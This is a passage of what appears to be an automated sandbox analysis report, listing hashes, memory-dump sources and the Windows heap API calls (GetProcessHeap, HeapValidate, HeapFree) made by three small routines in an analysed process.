                                                                                                                                                                                                            • API ID: Heap$AllocProcessmemcpymemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 471586229-0
                                                                                                                                                                                                            • Opcode ID: 8b181cff673113253bdef02b3a737c826583d8d3e4a7d9acebc80ae3461898fd
                                                                                                                                                                                                            • Instruction ID: 02cd2ca74084abcf3236a32b05680dda7670d2201db481e94ed3f0c922b3afa3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b181cff673113253bdef02b3a737c826583d8d3e4a7d9acebc80ae3461898fd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4AF0E533A0161077D6616AA9AC44FAF776CEF867A0F414350FF04EB241CA64DC1487F4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BF4145
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BF4148
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BF4155
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BF4158
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: d1580bcb031b66bd2b2213683ecadffec105f14ca9b64bbfe272fea829f41f0b
                                                                                                                                                                                                            • Instruction ID: 9214d891afc8c2011d47c8a6cb7af97f8f8a0290d7915e91daf54fec394dd846
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1580bcb031b66bd2b2213683ecadffec105f14ca9b64bbfe272fea829f41f0b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71E0EC32A4122877D6A06AB66C08F8BBF6CEF95BA1F458411F719A72409B719414CBF0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,6F9890B0,02BC0C69), ref: 02BC41BE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC41C1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC41CE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC41D1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1670920773-0
                                                                                                                                                                                                            • Opcode ID: 91e25dc496201b27eb70cab3445351a74c1a7bf33ef9004fed8fa2204f095916
                                                                                                                                                                                                            • Instruction ID: c121b3c2c30e2091ef8fb5d10c05e767b97d1b8314dd3e044456e777fc6c2387
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91e25dc496201b27eb70cab3445351a74c1a7bf33ef9004fed8fa2204f095916
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2D05261A82210A2DAB027B66C0CF1B6E2CEB90A92F924804BA45A3580CA2080608AB0